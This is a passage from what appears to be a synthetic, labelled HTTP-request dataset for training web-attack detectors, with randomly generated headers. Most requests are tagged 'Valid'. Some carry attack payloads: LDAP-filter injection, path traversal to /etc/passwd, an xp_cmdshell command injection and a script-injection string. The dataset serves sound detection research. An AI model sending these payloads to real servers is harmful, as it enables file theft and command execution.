Upgrade: 9aoe/3.6, dao/3.0, ucnVit/7.1, erAr/4.2
Warning: 819 www.ttnhr.shtml "rog8prr93m" "Wed, 03 Mar 04 11:36:52 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

uiurt9hye=948154642&ttlnatttt5hfra=)  (  |   (cn=*o 'brien*    )(mail    =*o    'brien*    ) 

End - Id: 37694
Start - Id: 2165
class: Valid
GET /cPmRoY_G7ufe/tq7abSnNJN7Dia@EXwr1/sEDtCTEZ-RjRO/rian8whcd7yntm/hesZ08.4/Na8wETma.png?Dhe=snEttneuhhiehEu&dearqfolhhohiwD=17041366&hNwuits=farmedlaAh%3Fsuk&8ejnee=%3Et%29&ik9nyeoWeW=r+6z2x%27n%7CD%3Cp9%25&ocgA=eSWiUgbN&c4xLnheIpVscdmL=eoetoRaed%25&iss=znmdetcomiog&ht7e7no=hyeieib3unlctto&Iossiotmaozhts=t6&WhtnytoieeeNs=3pr%27&Lt=rreqef&nltkTmtn9ery=hbfipah HTTP/1.1
Host: www.n2teoee1p.it
Connection: keep-alive
Accept: */*
Accept-Charset: gb2312, euc-cn, x-mac-chinesetrad
Accept-Encoding: deflate
Accept-Language: 8iet1mqi-c, xpr-x5t
Cache-Control: no-cache
Client-ip: 2.62.2.10
Cookie: nE=7468005280;_oLfQDrTinputM=E
Cookie2: $Version="993"
Date: Wed, 11 Jan 06 06:40:27 GMT
ETag: W/"ldhY1zvVnfBfA7RAK2MD"
Expect: 100-continue
From: cwaupt@0tmyctatse.net
If-Modified-Since: Sun, 08 Feb 09 05:31:47 CET
If-Unmodified-Since: Sat, 04 Nov 06 03:45:36 CET
If-Match: *
If-None-Match: "8SPRFHSK2C80mjsFgaK"
If-Range: Mon, 05 Jun 06 20:36:33 GMT
Max-Forwards: 22
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest qop=atod2e
Range: -5,61-,-809
Referer: /s1ioiull/llew/Stal7s/tmht.exe
TE: gzip;q=0.1,trailers
Trailer: Upgrade
User-Agent: myisl0qIrtl1
UA-CPU: MIPS
UA-Disp: 563,121,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 270x992
Via: 4.0 www.euesS.html
Transfer-Encoding: fsdove; do5tne=dh0c
Upgrade: zienis/1.2, iyetd7/7.3, isE8gA/1.8, ehh9m4/7.8, eeb/5.1
Warning: 722 4.238.114.92 "eaedoiYafssfmr6w" 
X-Forwarded-For: 130.173.148.175
X-Serial-Number: 9895241717803854226
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2165
Start - Id: 19858
class: Valid
GET /eGwwZW/avhpUQMFdAvJq/y9E@EbiFY03/vgeoyitoo/t6s50/hv5r/jjt9J1lMcuEsbeEe/tfooeseydr/a9RKG_v_7j8libKMk/UXiKyqnCgLYtmpL.asmx? HTTP/1.0
Host: 183.176.76.252
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: min-fresh=9595
Client-ip: 171.173.25.232
Cookie: et=taSsiframena(zselect4he9r nr;5rdxthip3haarLa=A37ati2dhabhyattl;_7zeIh97Vuan=txai0eFt5Nilde6N2n
Cookie2: $Version="4"
Date: Fri, 29 Apr 05 12:36:19 CET
ETag: "vVxwCMFMmG2BOCb9eJn"
Expect: mk4vr5o=ereacpfm
From: bisdtps@swes4lai54.net
If-Modified-Since: Mon, 03 Apr 06 04:16:23 CET
If-Unmodified-Since: Fri, 29 Apr 05 12:27:35 GMT
If-Match: "2kY7.QQtMBIUCXl"
If-None-Match: "vluJb6LIveBW8D_"
If-Range: Thu, 17 Mar 05 23:54:42 GMT
Max-Forwards: 903
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="1edg8te"
Authorization: tea1o nhanj=jrinhc
Range: -849,258-97,-882215
Referer: http://detlo.cz/nzteoda.exe
TE: deflate;q=0.4,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 5.8; mm-aa; rv:5.7.9) Gecko/55758387
UA-CPU: StrongARM
UA-Disp: 8579,909,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: HTTP/4.4 251.129.250.106, FTP/0.7 www.lk4shIo.html
Transfer-Encoding: trsc
Upgrade: ieot/7.9
Warning: 622 www.dgcaas.png "crere38dmlecltR" "Fri, 12 Oct 07 12:04:28 CET"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 62361021711
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19858
Start - Id: 1329
class: Valid
GET /dsuetyenityoy/sildEboc/YN_h.imgdVa_Wet/ottdprnbttrrebAntel/oW@ETbRaTautoexecHl.js?Cr=deU2ael3IL HTTP/1.1
Host: www.dlURebhI6a.uk
Connection: keep-alive
Accept: audio/basic, audio/*
Accept-Charset: us-ascii, koi8, iso-8859-5, iso-8859-8, utf-7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=2128
Client-ip: 184.24.253.5
Cookie: use=etahtw;ok0thw8di8p=8067159
Cookie2: $Version="0"
Date: Mon, 18 May 09 23:38:00 GMT
ETag: "@txm.HfeGYjxhXF"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Sun, 27 Nov 05 11:14:46 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Jan 05 03:18:41 GMT
Max-Forwards: 0453
MIME-Version: 4.4
Pragma: sh=Rjokoot
Proxy-Authorization: e9vjnk aure=ntiF
Authorization: os0tte Hhcl=l6orCcng
Range: -216
Referer: /ozusSl/3opiai/tmsc8.pl
TE: trailers,trailers
Trailer: Via
User-Agent: omtv0b (66pC2JgJi)
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 290x591
Via: 6.1 www.ae65f.tiff, FTP/9.2 227.85.85.104
Transfer-Encoding: 5dt0an
Upgrade: oasUc1/8.1, Dt6u/0.5, ako/9.5, Qsi/1.9, 4ni/6.3
Warning: 675 152.164.237.155:96322 "ETfahluea3TdlonTohhl" 
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 28172418351681
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1329
Start - Id: 7053
class: Valid
POST /ijpZJ9QAXMnp3s4/tVWsnURy/5wuD1_/NksD1KZDdbJ8I/tlqnrA.bin? HTTP/1.1
Content-Length: 93
Content-Language: ora
Content-Encoding: identity
Content-Location: /temero.avi
Content-MD5: a3ByZUxpZGFzaWlvZTlhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jun 07 15:46:29 UTC
Last-Modified: Tue, 28 Aug 07 06:13:24 CET
Host: 216.29.28.127:80
Connection: mx4gn
Accept: application/rtf, application/rtf, video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 132.198.29.0
Cookie: ttwlpL7rtnxsoh=maadH;ohoyeil=rid4ymo
Cookie2: $Version="459"
Date: Mon, 01 Mar 04 04:48:09 UTC
ETag: W/"zqSNf80KOhG4_gtigkN"
Expect: Ol2jw
From: 0eime@LbeI4fNnf.net
If-Modified-Since: Mon, 04 Feb 08 20:11:50 GMT
If-Unmodified-Since: Sat, 20 Mar 04 07:40:14 GMT
If-Match: *
If-None-Match: "1tPMAVs7JRdZlWOA9"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: av6on gevp5=fEhrwh
Authorization: e4Ee3e rottSr=owan
Range: -8,-8,0-
Referer: /igNmjpq/et0y1htl/DAed11n.wav
TE: trailers
Trailer: Pragma
User-Agent: heessstr8 (ocY_L4B8UI)
UA-CPU: Sparc
UA-Disp: 4109,8794,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8498x1908
Via: 0.9 www.rPem.html:212
Transfer-Encoding: whrt; iodyNbUu=foof
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 083 170.246.141.163 "Eoeoetconodpehi" 
X-Forwarded-For: 246.222.176.176
X-Serial-Number: 484018235309
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oia3ier=ebgsoundb7 null&stu=howspoCnxoibhIcrh&c11atl4hedcp0=C&raoetaw=teReltgBeddlho6&etnp=ts

End - Id: 7053
Start - Id: 11009
class: Valid
GET /eR7CbUEjmh/i0oxTA9nhqI/earhdEdammusF/gs2e.shtml?OItkua=TrTteeptoA&ntidel3ea4ssB=saapjn35t&pael7saleaict=1099&lsygss=4406&9dotE=+w&WdaeihdmzhN=owqu620n.&3eofjPtrcna7eao=7812296&enMotb9lr6=2412&rnru=Adddesn15drnSomng&ftp2drinetcatvav=7266897&osttuwi=s3eWiz+YUnst4 HTTP/1.1
Host: www.whlysd.biz
Connection: mthtteon
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: sos4='fwOeupih'
Client-ip: 201.77.21.42
Cookie: tWaEibsaIdinte=sel47Aeodta;barisnAnvpr=97524784;8wsetutasbtie=r2CgausDa@J
Cookie2: $Version="17"
Date: Wed, 25 Jun 08 14:11:51 CET
ETag: "9zaHIlbRk0sS1PMR"
Expect: aoitsr=Ai0ma
From: aewoeu@ihehwo.net
If-Modified-Since: Fri, 24 Nov 06 07:22:17 GMT
If-Unmodified-Since: Sun, 19 Feb 06 11:53:11 CET
If-Match: *
If-None-Match: "SEXB1EMGZeUo_OkAXm"
If-Range: "dE6vljLZxQSoOkcJ"
Max-Forwards: 1
MIME-Version: 9.8
Pragma: h43Ymlla='vta'
Proxy-Authorization: ayTqd ipelosnh=nhw7hz
Authorization: Basic ZWxuODllYXM6dG9vZg==
Range: 088577-,4710-50
Referer: http://oups.ch/AEdSeut/Oieocqi/i7ao/m7um/9ereA.asmx
TE: gzip,trailers,trailers
Trailer: Date
User-Agent: Mozilla/8.5 (Machintosh; U; PPC 7.2; Lw-ki; rv:9.2.9) Gecko/60063215
UA-CPU: Sparc
UA-Disp: 618,722,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 124x705
Via: HTTP/6.5 www.escO.jpg
Transfer-Encoding: compress
Upgrade: lhnj/8.6, tEe/2.7, nte/7.2
Warning: 404 55.233.111.251 "hwzpimntn" 
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11009
Start - Id: 46137
class: PathTransversal
GET /qGL@8_jaU_W/l7auOitteromtseo1tB4/RySallX/d5pd/sEWn3a-0kPanaW5Mn/i2rtnys/l6kRlN9i8R0A1ccORWpK/bndsaoed/fnR2eTi/4iF1jhk/iiUstwalitjirt3bi7o.mspx?rr6w5bA=53&heao=rht&banK1yeeep=cl&enteltt=2421&m5do=qej%3A2xp_im%7Eeiatw&1gesoa7eLfpnd=WB&Twe2=Enez+5zdei&uvymoAexwnceP6a=%7EKh&1OMne1adduTsPA=9%3B&pcs6z3m9ton2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.0
Host: www.Edl3rr5.st
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-japanese;q=0.7, x-mac-chinesesimp;q=0.6, iso-8859-7;q=0.3, iso-8859-4;q=0.8, iso-2022-kr
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 136.234.111.217
Cookie: aY64kT5=A
Cookie2: $Version="5"
Date: Thu, 02 Jul 09 09:55:59 GMT
ETag: W/"GpXBhJEcBz_@Y8t"
Expect: 100-continue
From: r9hecgen@ob8h.it
If-Modified-Since: Thu, 03 Jan 08 15:10:33 GMT
If-Unmodified-Since: Sun, 04 Feb 07 03:24:15 GMT
If-Match: "uKJ0-pMXX2Tr5VWZstpU"
If-None-Match: "UZfRrMcX6zPB_Ha3Patl"
If-Range: *
Max-Forwards: 4853
MIME-Version: 0.5
Pragma: iu=t
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
Authorization: NTLM ZWFhZW5lU1hlZ0huYWU3Y1Fhbmllb25uZXM3bnRycExSdHJzd2VyN3M=
Referer: /d6SOm.gif
TE: deflate
Trailer: Transfer-Encoding
User-Agent: rSpoahnlbcreusettsr
UA-OS: Windows NT
Via: 5.7 www.rboyeeor.html:77
Transfer-Encoding: identity
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 83931
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46137
Start - Id: 36410
class: OsCommanding
GET /atisn/abbgamgibam6n/dtxtinn/saboyem/oi/dgVjnSC15NPgXuzq/eAN-aa4hFk4/6scripta/7SiWaz2Dih_6RBYtCKO.exe?zeedisvNtds=AErt6edZsf&hoadHopa6eC6=fromi%3A&3r=iE%26%26shoYderien&3mwi=exec+xp_cmdshell++++%27%22ngeu%22+++%3E%3E+script.vbs%27&sc2ogoogvdi=cH9D&WID1JM2k@GS=weTh9iwstuEkre HTTP/1.0
Host: www.ynmOc6nmf8.org:497
Connection: 7cnietbI
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-japanese, windows-1251;q=0.5
Accept-Encoding: identity;q=0.2, compress, deflate, deflate;q=0.0
Accept-Language: aqcteh-epamoy, rin-oTSrwoea, eob-pTa;q=0.3, gyeNhcam-8, 4ehtaw-oVpytlpt
Cache-Control: no-transform
Client-ip: 133.214.196.239
Cookie: t3rtd9=stKIuvxI
Cookie2: $Version="16"
Date: Thu, 23 Jul 09 05:11:13 GMT
ETag: "hOr.gXCisBKC7v6cJQ"
Expect: 100-continue
If-Modified-Since: Sun, 23 May 04 21:56:53 CET
If-Unmodified-Since: Mon, 01 Sep 08 16:25:48 GMT
If-Match: "miioiKEU.aSXulYbQXb"
If-None-Match: *
If-Range: *
Max-Forwards: 143
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM bmlvMHVsbHB0bGNvbGF0aW5XYmphZW5MYXNvdGlvRXJBaGd3NGVmZ20=
Authorization: oadi wa4vrgfs=fietzjqd
Range: 789-975
Referer: http://www.oateadn.net/l8jRh5/stiy/azs76/bzleeEi.asp
TE: trailers,trailers,deflate;q=0.0
Trailer: Expect
User-Agent: Mozilla/6.3 (Machintosh; U; PPC Mac OS X 4.0; to-py; rv:4.1.6) Gecko/14087266
UA-CPU: PowerPC
UA-Color: color16
Via: HTTP/5.2 131.19.139.57:0220, 8.3 www.reae.jpeg
Transfer-Encoding: identity
Upgrade: ehax/0.1, twoX/5.2, amhin/1.7, Nyuis8/4.4, rta/1.3
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 3132284615
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36410
Start - Id: 34204
class: Valid
POST /Qand92/dbj15/BdSWzvkN@Se2insert/uyiBpFBRoV.C/iOe2jSze1le/YsammMjilbo/sSzSHYeEl3.R/sh_Gk--r.k1.mdb? HTTP/1.0
Content-Length: 174
Content-Language: ctsS
Content-Encoding: identity
Content-Location: /da3tne.png
Content-MD5: cnRldVVQQzJkZGx4T3Fmag==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Apr 08 23:23:53 GMT
Last-Modified: Sun, 03 Oct 04 10:03:28 GMT
Host: 33.155.148.26
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: o4x-2t;q=0.9
Cache-Control: max-age=177
Client-ip: 153.23.173.177
Cookie: wcRdfuh6Ntmolx=7157377;AXDax=dQHSSKM;ostnW9oeas=teByZd;rwMe39=4711;ilISg=)ko8
Cookie2: $Version="29"
Date: Sat, 13 Aug 05 07:07:50 GMT
ETag: "K2_PZU7cF5N0NXJO"
Expect: 4oqddoia=lX5edc
From: llrradu@4vhsetp.com
If-Modified-Since: Sun, 26 Apr 09 06:48:56 CET
If-Unmodified-Since: Sun, 14 Jun 09 13:39:45 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Mar 06 07:33:39 GMT
Max-Forwards: 5112
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: mhdk mTsemHH2=tiTaS
Authorization: pjtxah 8ptean1=inao
Range: 40581-
Referer: http://www.1aytes.cz/B0TlorE/h3lloha/mi58d/w2rfA.gif
TE: deflate;q=0.0,gzip;q=0.1,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.1 (Windows; U; Win98 5.4; eh-Gc; rv:2.3.4) Gecko/95824170
UA-CPU: x86
UA-Disp: 5943,076,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 306x913
Via: FTP/6.8 www.nsinrS.js, 9.4 202.64.227.76
Transfer-Encoding: e1xpO; otIO=qch5ntcm
Upgrade: l4mic/8.6
Warning: 422 150.71.176.60:83957 "bprw97nHpMnucAo" 
X-Forwarded-For: 161.13.197.27
X-Serial-Number: 7747668675736673
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dan=2ri97rsoaoi&wa68=neraeRaotliSsipz&ionYuan=oRG.gf7Y&lrpukhaes7in1ij=hlK88G&aaift3ogl=ud&oht0ounu=8sasRi==l&izmsedpteara=o4bJ&hin=ftb;ttt&nHbdf4a6e=Jsgsb&httGeofue=Ue

End - Id: 34204
Start - Id: 22525
class: Valid
GET /Hatayohq1u/tvCDpNNASxMRmLxyt/hhen/u-GaR0s/brq7_sam8sYFd/r43ZShkbOs/mmv81brE6sj.php4?etoe=1582531&noar5Ta1iri3=+&co=t6dhesane&55=ks%3EshR5ercvhaapo%3C%25u+3&CrEu_5dUcyOb=Swhnu&de2trtn3ienralT=eT&odrre=8061329&ebrce6n1trnw7=pzC-loIhSU&q.oGm7a8d=4613&ih=eaccdeg&allR307S2=oRc&@pechoKFO=b%24%25Eavtuidocument30v%2FA0&oh=a+notdeora HTTP/1.0
Host: www.ethb9oEt.it
Connection: close
Accept: */*
Accept-Charset: euc-jp, windows-1254;q=0.1, iso-10646-ucs-2, euc-tw;q=0.2, euc-jp;q=0.9
Accept-Encoding: 
Accept-Language: eiszawf-thu;q=0.8, Heeh9Inf-epeiiUe;q=0.8, edl-nmc, aoraone-po4c2, plo7b-h;q=0.2
Cache-Control: max-age=18316
Client-ip: 49.144.79.218
Cookie: orbenegotu=n;toarie3TotaTTht=sisock_streamesstylen'alo(lq+t
Cookie2: $Version="52"
Date: Tue, 12 Feb 08 06:55:41 UTC
ETag: W/"nxRHKEK.BQeNWF48@A5-"
Expect: 100-continue
From: 6iet@tn6imledai.ch
If-Modified-Since: Sun, 12 Sep 04 19:31:18 UTC
If-Unmodified-Since: Sun, 17 Sep 06 09:58:29 UTC
If-Match: *
If-None-Match: "T8W6rYM0q65mtV0JG"
If-Range: *
Max-Forwards: 9416
MIME-Version: 2.5
Pragma: n1=llmAB
Proxy-Authorization: Basic cnJpMGFlbjptaDlpcw==
Authorization: 5tvplh a2el=1oey3irn
Range: 97-403959,415744-,056-023107
Referer: /amFC/7tGhe/adapjtep.nsf
TE: deflate,trailers
Trailer: Connection
User-Agent: uasir7rsdeep3odwalae
UA-CPU: Sparc
UA-Disp: 017,7733,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 568x5684
Via: HTTP/3.9 200.124.217.147, 2.8 10.145.140.74, 3.0 www.ishh.shtml
Transfer-Encoding: ffahwy; h6LTer=lBvEu6t
Upgrade: yul/1.8, gvic/9.5, hGaw/6.7, Hpe/9.6, dae/2.3
Warning: 050 42.224.216.74 "terFienh" "Wed, 12 Mar 08 09:39:17 GMT"
X-Forwarded-For: 227.174.126.186
X-Serial-Number: 0491740909145878411
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22525
Start - Id: 11416
class: Valid
GET /efZy/jes0sdic7l/lehtrfrTrda/emEL3_WH6/o5rgSY0q@5.fUZNQAKrS/n8eM.b5gFHvLZ9N/efisemTioafwnj0pe/t@8sVWyS2o7PMy/a0e.jpeg? HTTP/1.1
Host: 23.233.126.42
Connection: epdrn
Accept: text/xml;q=0.6, application/postscript
Accept-Charset: x-mac-roman;q=0.8, koi8, euc-jp, x-mac-turkish, koi8-r;q=0.0
Accept-Encoding: compress;q=0.5, gzip;q=0.6, identity, identity
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 148.233.33.178
Cookie: oelrovNHt3=nQ0Gaf;isEaezn=977415
Cookie2: $Version="67"
Date: Wed, 09 Mar 05 16:51:06 GMT
ETag: "zLbaFBPD.kIg8Ud1WAJd"
Expect: 100-continue
From: Os6stee@odgijfte0u.ch
If-Modified-Since: Mon, 25 Oct 04 13:11:47 UTC
If-Unmodified-Since: Fri, 06 Feb 04 17:50:01 GMT
If-Match: "pCw-hFwEtCbiVMy"
If-None-Match: *
If-Range: Wed, 17 Sep 08 21:13:21 GMT
Max-Forwards: 9
MIME-Version: 4.6
Pragma: n=4ius
Proxy-Authorization: Basic bXNpcmZqdzpvbGZCam5l
Authorization: NTLM dW9yYmhmYjZlYzNyaHd5NHdhczY5RWVlT2VndDNhZDhzbmQ2ZTd0YXA=
Range: -56,26-
Referer: /n8il1end/eae3sme/thbhh/oemAhf.pl
TE: trailers
Trailer: If-Modified-Since
User-Agent: 2A5ICeaVdT http://www.paton.ch
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 078x9567
Via: s6nas/1.5 www.onE7iut.png, gizxei/3.3 www.akcboe.jpg, o0c/7.4 154.87.222.234
Transfer-Encoding: gzip
Upgrade: ahoel/3.1, wtEif/8.0
Warning: 602 88.249.39.89 "aeraeytusrieOtkxPo" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 550681
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11416
Start - Id: 33109
class: Valid
POST /tEit/rrV6ce.pqmIxa.jpg? HTTP/1.1
Content-Length: 260
Content-Language: MoRUh,nd0ehafr
Content-Encoding: compress
Content-Location: http://www.naCgoee.be/ndqrtt.png
Content-MD5: MGltdFFramJ0bnhFVXRyMg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Jan 06 06:13:50 CET
Last-Modified: Thu, 26 Oct 06 14:50:37 CET
Host: 211.44.19.166:80
Connection: wantl
Accept: video/*, text/plain
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: tseoyD=v
Client-ip: 57.247.26.248
Cookie: _INeNzq.-Ga=36;7sAesnrasjet=e3nij;XcsamqbgsoundrmrcpdocumentQy0X=prnc1oaz
Cookie2: $Version="37"
Date: Sun, 05 Feb 06 09:57:15 GMT
ETag: W/"aVMpeQy9lz6kGRwdj_tn"
Expect: 100-continue
From: xeaneer@rsdfgo9iE.net
If-Modified-Since: Sat, 05 Aug 06 20:16:00 UTC
If-Unmodified-Since: Tue, 10 Feb 09 12:20:06 GMT
If-Match: "skf551gwvuuWyHjZLoo"
If-None-Match: "g.VKF8R_vVs5yvn_o"
If-Range: Wed, 15 Sep 04 11:59:07 CET
Max-Forwards: 596
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic ZWxudHRsOmk0ZTFl
Authorization: Digest nc=c1e03B3a
Range: -794940,20-24662
Referer: http://p8zele4.fr/mgrew/nti7l/nfneR4t.php3
TE: chunked;q=0.5,trailers,chunked;q=0.5
Trailer: User-Agent
User-Agent: xdsdleoyhabwom4uaiR
UA-CPU: Sparc
UA-Disp: 8524,604,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 6581x441
Via: 6.4 176.210.3.204, FTP/1.0 www.7bvyEeSa.js, ab0Gl5/9.4 www.osT1.shtml
Transfer-Encoding: deflate
Upgrade: dto/7.0
Warning: 956 www.r68u.htm:49944 "evd84o8ca9e" "Thu, 15 Dec 05 04:21:49 CET"
X-Forwarded-For: 149.226.91.226
X-Serial-Number: 1678510010970720338
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

cehve4Raqynk=oiN7hT-4QL6w&rlh1nln5z=d?&Olhpdh=4049247&atsifsf=ak4.2-O@U&7sfuild3t=e;;a-l~sZqs:dropccstLUj&wojSr7Asuas=742050&ztMuphE2rt=80781&Eoidd=sr@mi&tsehoAeg=fhaving2ceyceMe6jpoh&onTstqletpm==&wteciue=9ialmeaauo&v1MW1= hrbamochaoptpl>etd

End - Id: 33109
Start - Id: 30130
class: Valid
GET /away/2N0Fweb3/53oQ/0lazreomhlof/lKAOLLZ026.-whV/UD.pl?1rmaoQh_P=kMg%3Co&aKjvCRzy=yqIarbDQu&w9odRohTEg=ietdibwneAevbscriptlm&hClhheegNiecyt=b&oac=yec8ofEzhmbar&eitdaegdxfuoep=2&ncLesd=+where&ntsmqb=dcogiesqNy&Yserebe=44391841&yters1outiep=srZVmesamxp&PLq3PYs5=8&euqy0en=02221113&rHmoni2er=edaaxi9&wsyAis=4&toemva=samdlw%2Be HTTP/1.0
Host: www.sin3TD.biz:49725
Connection: keep-alive
Accept: */*
Accept-Charset: koi8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 216.196.168.33
Cookie: aPOeaRnodeQ=c=paept%srle5;phpIHhttpVZZKLg.=eKi52;uotim=640;ldeho=168977411;tijeei=Mfis
Cookie2: $Version="029"
Date: Sun, 22 Feb 09 02:21:45 UTC
ETag: "K2aUpoup.-7XH6viZY"
Expect: 100-continue
From: aolte3O@7ltytl.cz
If-Modified-Since: Sun, 05 Feb 06 18:59:49 CET
If-Unmodified-Since: Sun, 25 Jun 06 21:00:58 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Sep 07 24:23:36 UTC
Max-Forwards: 0266
MIME-Version: 1.8
Pragma: 5etwl='ulo'
Proxy-Authorization: Basic aXRoZTp5aHRhb2Y=
Authorization: Basic OWhtZWpmdW06VGVua25h
Range: 85-19667
Referer: /vone8s/NawtlI/rtry.php3
TE: gzip
Trailer: Upgrade
User-Agent: Mozilla/2.4 (Windows; U; Win98 5.6; ho-nV; rv:2.0.9) Gecko/29802434
UA-CPU: Sparc
UA-Disp: 834,9850,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 146x988
Via: FTP/4.4 www.oxse.jpg, HTTP/9.9 www.ct5zcere.png
Transfer-Encoding: identity
Upgrade: atUnh/6.9, c0y/8.9, Tr3Ld/2.0, m2seTE/9.9, df38/8.9
Warning: 196 20.227.62.117 "yeoclsstdewnrausitue" "Mon, 21 May 07 14:22:24 UTC"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 56155
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30130
Start - Id: 47739
class: XSS
GET /3uB9o/eRK/JykNi87bodygCmu/2RV9T7ms-Q/euc5nMAydynutezejda/ac2dhrsbgTquarreiv/ehegques/ew_8@dCU5Dia.nhxOb/as8VL2iUESPhnfvpVpo/t6zVd2QW50.gif?de=%25%40&Ie4OnoGain=asenA&M9window.openmsBl=9oms&yetkagmlmaiKOLt=hntarTtpNe&mT7v3naeeiefsim=093&ywrcvhGubDmSot=%3Ca+href+++%3D%22+++about%3A%3Cs%26%2399%3Bript%3E%5Balert+%28%27ht95d9%27%29%3B%5D%3C%2Fscript+%3E%22%3E HTTP/1.0
Host: 16.109.220.243
Connection: close
Accept: audio/x-wav;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: xeece-erjwi, c-Te7wtnk;q=0.9, Ss-9z;q=0.5, apfdc-jche;q=0.6
Cache-Control: abac4enA=ns0
Client-ip: 241.206.24.189
Cookie: us=ae2n;4eFp-DQsA.=l]em0dteD;f1K.GtT3=itlikes;za=he_VeDk2.;RlgipsatehaHa=w jl1sRytntmse;tca5xeretefr=8841
Cookie2: $Version="054"
Date: Thu, 15 Feb 07 11:15:20 UTC
ETag: "B3GtyHgDy1kQ_H-."
Expect: asn70
From: rlNe@ecetad6.fr
If-Modified-Since: Sun, 04 Jul 04 04:06:51 UTC
If-Unmodified-Since: Sun, 01 Aug 04 15:41:19 GMT
If-Match: *
If-None-Match: "YAlcOtQPurdfiboFdS"
If-Range: "FT.a9Vcvg2dx1WBK5hXF"
Max-Forwards: 5211
MIME-Version: 7.7
Pragma: ehUEzeMe=od5rbea
Proxy-Authorization: Digest response="D8344b9E3FE9A6df47B462B8bDbe58B1"
Authorization: te0zsl ht56=rbiy4mx
Range: -887125,6715-3229
Referer: http://ewaiod.be/nnAf6aE/sane.wav
TE: gzip,chunked;q=0.8
Trailer: Date
User-Agent: Mozilla/6.9 (Windows; U; Windows NT 8.4; sn-na; rv:8.1.8) Gecko/22999505
UA-CPU: 68000
UA-Disp: 746,0945,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 0710x100
Via: 0.3 www.cnOsnEfk.jpeg, 8.6 www.nhgaJ.jpg
Transfer-Encoding: Ortu; dz2you=td8thhn
Upgrade: 1eEw/6.0
Warning: 204 41.21.10.144 "pfgeDet" 
